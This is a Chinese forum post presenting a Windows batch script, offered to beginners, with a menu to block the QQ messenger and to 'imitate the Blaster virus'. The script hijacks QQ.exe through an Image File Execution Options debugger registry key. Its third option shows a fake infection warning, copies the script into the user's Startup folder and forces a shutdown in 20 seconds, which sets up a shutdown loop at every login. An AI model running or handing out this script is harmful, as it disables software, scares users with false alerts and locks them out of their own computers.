这个是一个很简单的一个批处理,专供新手研究!高手跳过!- @echo off
- echo.
- echo 支持原创!!!欢迎盗版!!!(待续……)
- echo.
- echo ==================================================================
- echo 作者:AK47 QQ:812263357
- echo ==================================================================
- echo a:禁止QQ运行!
- echo b:恢复QQ运行!
- echo c:仿冲击波病毒!
- set /p s=
- if "%s%" equ "a" goto a
- if "%s%" equ "b" goto b
- if "%s%" equ "c" goto c
- goto end
- :a
- reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v debugger /t reg_sz /d debugfile.exe /f &goto end
- :b
- @reg delete "hklm\software\microsoft\windows nt\currentversion\image file execution options\qq.exe" /f &goto end
- :c
- msg %username% 你的电脑已中冲击波病毒,系统将在20秒内关机!
- @copy a.bat "%userprofile%\「开始」菜单\程序\启动\"
- shutdown -s -t 20
- :end
- pause>nul
复制代码
|